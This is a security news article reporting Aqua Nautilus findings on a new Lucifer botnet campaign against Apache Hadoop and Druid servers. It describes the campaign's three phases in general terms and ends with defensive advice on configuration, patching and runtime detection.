A new version of the Lucifer botnet is currently targeting organizations using Apache Hadoop and Apache Druid big data technologies, a recent report from Aqua Nautilus revealed. The Lucifer botnet, which has combined capabilities for cryptojacking and distributed denial of service (DDoS) attacks, is being utilized by the threat actor responsible for the campaign.
The emergence of this campaign marks a significant deviation from the usual behavior of the Lucifer botnet. An analysis from Aqua Nautilus this week indicated that the operators of the botnet are experimenting with new infection processes, suggesting that this could be a prelude to a larger, more widespread campaign.
The Lucifer malware was initially discovered by researchers at Palo Alto Networks in May 2020. Back then, the company identified the threat as a dangerous hybrid malware, that encompasses DDoS enabling, and XMRig for mining the cryptocurrency Monero. This was a serious threat, as the attackers were also using Lucifer to deploy the NSA’s leaked EternalBlue, EternalRomance, and DoublePulsar malware and exploits onto the targeted systems.
Researchers also warned at the time that Lucifer was a new and dangerous variant of cryptojacking and DDoS malware, particularly concerning Windows platforms. This week, it was revealed that the same threat has resurfaced and is specifically targeting Apache servers.
Aqua Nautilus researchers disclosed that they have observed more than 3,000 unique attacks against Apache Hadoop, Apache Druid, and Apache Flink honeypots over the last month alone. These attacks have persisted for approximately six months and have been characterized by three distinct phases, suggesting that the adversary is refining its tactics and techniques before launching a full-scale offensive.
In the first phase of attacks, the threat actors scanned the Internet for misconfigured Hadoop instances, with a particular interest in the Hadoop YARN technology. Once a vulnerable system was identified, the attackers exploited it to download and execute the Lucifer malware.
The second phase featured a similar approach, targeting misconfigurations in the Hadoop big-data stack. However, in this instance, the attackers deployed two binaries on the compromised system as part of their attack strategy.
Finally, in the third phase, the attackers pivoted their focus to vulnerable Apache Druid hosts, exploiting a known command injection vulnerability to download and execute the Lucifer malware. Notably, they split the downloading and execution of the malware between two binary files as an attempt to bypass detection mechanisms.
The escalation and evolution of the Lucifer botnet’s capabilities pose a significant threat to organizations utilizing big data technologies, especially those running Apache Hadoop and Apache Druid. To safeguard against potential cyberattacks, enterprises should proactively review their system configurations for misconfigurations and ensure all patches are up-to-date. Additionally, deploying rigorous runtime detection and response solutions can help identify and mitigate unknown threats, in addition to being cautious with the use of open-source libraries and code.
As the Lucifer botnet’s activities continue to evolve, it is imperative for organizations to remain vigilant and adopt robust security measures to protect their big data infrastructure from potential attacks.